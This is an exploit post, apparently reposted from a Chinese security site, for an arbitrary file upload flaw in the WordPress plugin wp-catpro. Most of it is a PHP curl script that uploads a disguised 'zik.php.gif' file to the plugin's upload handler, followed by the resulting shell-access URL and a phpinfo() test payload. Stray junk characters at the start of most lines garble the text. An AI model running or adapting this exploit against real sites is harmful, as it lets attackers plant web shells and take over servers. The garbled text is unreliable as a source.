WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
" d$ t( q6 @; v! o5 E
; U$ S) R; ~4 t, V- T% ]作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
5 j" z  u" C! L8 w/ D- c8 v下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
+ S3 D; l( g$ z" r, H####

#=> Exploit 信息:
------------------
; I6 M2 C; r0 T  S5 Y3 i; K# 攻击者可以上传 file/shell.php.gif
3 z$ x9 K0 d) o# k4 l% c% }' \# ("jpg", "gif", "png")  // Allowed file extensions
( b- @# l- `! x7 S# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
1 A0 ~4 f6 Q/ R( E' @# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
3 W4 L* w; |* _* c-----------
<?php
7 \7 O1 c% E; F$ `1 }
9 C" c/ x; n( a2 W$uploadfile="zik.php.gif";
9 J' r3 T. x/ }" U* h$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
9 i. |" V; {& ]1 m; u+ d% Mcurl_setopt($ch, CURLOPT_POST, true);
- X1 N8 N4 O: O1 M' Dcurl_setopt($ch, CURLOPT_POSTFIELDS,
( v% ]/ r4 W5 C! D  E9 ^array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

" t8 T3 _, u, c1 P- v- `- @Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
9 a; n% q' E/ W) v6 e4 H! n3 G<?php
5 F! `6 l0 s0 g' H& Yphpinfo();
3 r, o& r% Y& K) U5 L?>